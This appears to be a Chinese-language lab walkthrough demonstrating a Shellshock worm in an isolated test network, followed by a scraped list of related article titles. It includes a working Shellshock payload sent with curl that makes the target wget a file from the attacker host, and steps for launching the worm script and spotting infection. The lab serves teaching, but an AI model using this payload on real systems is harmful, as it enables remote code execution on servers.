使用ssh登录蠕虫发起者主机(10.1.1.231),执行下面三条命令。命令执行结果如下图所示。

[root@worm-master ~]# tail /var/log/httpd/access_log

[root@worm-master ~]# curl -A “() { :; }; /usr/bin/wget http://10.1.1.231/shock” http://10.1.1.12/test.cgi

[root@worm-master ~]# tail /var/log/httpd/access_log

1.为了避免自身被感染,向蠕虫表明自己是发起者的身份,我们需要登录10.1.1.231主机,通过下面的命令创建一个文件。

[root@worm-master ~]# touch /tmp/key.txt

2.继续在10.1.1.231上执行下面的命令,可以找到蠕虫程序。

[root@worm-master shockworm]# cd /root/shockworm/

[root@worm-master shockworm]# ls

Shellshock.pl

3.登录worm1,查看/tmp目录。

[root@worm-test1 tmp]# ls -al

4.继续返回10.1.1.231主机,执行下面的命令,来运行蠕虫程序。

[root@worm-master shockworm]# perl shellshock.pl

5.登录Worm1,执行下面的命令,观察被感染的特征。

[root@worm-test1 tmp]# ls -al

[root@worm-test1 tmp]# ls .ssh-mOTc45gfXwPj/

[root@worm-test1 tmp]# ps aux | grep agent.1337

通过对比/tmp目录可以发现,Worm1已经被感染了shockworm蠕虫程序,如下图。

破壳漏洞的原理与利用相关推荐

  1. PHP 绕过禁用函数漏洞的原理与利用分析

     聚焦源代码安全,网罗国内外最新资讯! 漏洞简介 PHP 发布公告,旧版本的 php_array_merge_recursive 函数中存在UAF风险,被利用可能导致用来绕过禁用函数. 受影响的版本 ...

  2. php 函数漏洞,PHP绕过禁用函数漏洞的原理与利用分析

    漏洞简介 PHP 发布公告,旧版本的 php_array_merge_recursive 函数中存在UAF风险,被利用可能导致用来绕过禁用函数. 受影响的版本 PHP 7.2 - 7.4.9 安全专家 ...

  3. 文件包含的漏洞、原理、利用

    最近的总结都比较简单,但不是在水,只是在我学习过程中总结的觉得真的有用的知识,还有就是有些代码发不出来我也没办法,所以就有所调整. 文件包含原理是啥? 文件包含漏洞:即file inclusion,意 ...

  4. Web安全-浅析CSV注入漏洞的原理及利用

    文章目录 漏洞简介 漏洞原理 漏洞利用 命令执行 钓鱼攻击 反弹shell 漏洞实例 Twitter网站 Hackerone 漏洞挖掘 漏洞防御 漏洞简介 CSV 注入(CSV Injection)漏 ...

  5. 基于破壳漏洞的蠕虫实践

    基于破壳漏洞的蠕虫实践 本实验介绍了一款基于shellshock漏洞的简单蠕虫程序,通过本实验,你可以了解蠕虫的使用与传播方式,也可以亲自动手随心所欲的改造这款蠕虫程序. 实验简介 实验所属系列:操作 ...

  6. (23)【漏洞利用】【原理、利用过程】中间件解析漏洞、CMS漏洞、编辑器漏洞、CVE漏洞

    目录 解析漏洞: 原理: 变化因素: 熟知的中间件(解析漏洞) 0x01    IIS5.x-6.x解析漏洞: (1)目录解析漏洞(IIS6.0) 原理: 利用过程: (2)文件解析漏洞 原理: 利用 ...

  7. 浅谈SQL注入漏洞原理及利用方式

    1.SQL注入 原理: 在数据交互中,前端的数据传入到后台处理时,由于后端没有做严格的判断,导致其传入的恶意"数据"拼接到SQL语句中后,被当作SQL语句的一部分执行.漏洞产生于脚 ...

  8. XSS漏洞原理和利用

    XSS漏洞原理和利用 XSS漏洞的危害 1.窃取用户Cookie,如果用户Cookie被窃取,攻击者可以不通过密码,而直接登录用户账户 2.使用XMLHttpRequest构造模拟用户请求操作 3.X ...

  9. linux 破壳漏洞,Bash破壳漏洞

    "破壳"是一个严重漏洞的别名,在Red Hat.CentOS.Ubuntu.Fedora.Amazon Linux.OS X 10.10中均拥有存在CVE-2014-6271(即& ...

最新文章

  1. HashMap内部结构深入剖析
  2. 清华计算机与科学系考研,清华计算机科学与技术系考研怎么复习
  3. C#中 .resx文件
  4. SQLSERVER中修复状态为Suspect的数据库
  5. Cacti 每日导出图形及流量报表 [未完成]
  6. SAP从业者群里讨论SAP技术的更新换代问题
  7. linux下安装nginx tar包,Linux环境下Nginx的安装
  8. C# DataTable 用法简介
  9. tensorflow分类的loss函数_Tensorflow Keras的loss函数总结
  10. Memcached · 最佳实践 · 热点 Key 问题解决方案
  11. 两个辅助指针变量挖字符串
  12. 基于 SurfaceView 的直播点亮心形效果
  13. mkdir命令(转)
  14. 360壁纸图片API收录
  15. Flash停更!「偷菜」的快乐还记得吗?
  16. 【数字】求特定三位数
  17. 基于激光投影技术的虚拟键盘
  18. 8421码,5421码,2421码,余3码特点及转换
  19. HTML5中polygon坐标,SVG Polygon(多边形)
  20. 如何用光盘映像文件重装服务器系统,使用ISO系统镜像文件重装系统的方法集合...

热门文章

  1. 计算机专业转生物信息(bioinformatics)方向必看视频
  2. 项目:宅人食堂——点餐系统
  3. flinkSql中自定义时间窗口开启时间
  4. 【C语言刷LeetCode】883. 三维形体投影面积(E)
  5. 2020无人用的邮箱和密码大全_Amazon后台登录密码错误!如何辨别账号是否被冻结?...
  6. 互联网金融:为什么贷前风控需要进行手机号码验证(联通、移动、电信)
  7. 什么是发布非约定商品?发布非约定商品的处罚是什么?
  8. AnnotationConfigApplicationContext 报错 has not been refreshed yet
  9. python田忌赛马
  10. .net 流——使用流进行文件复制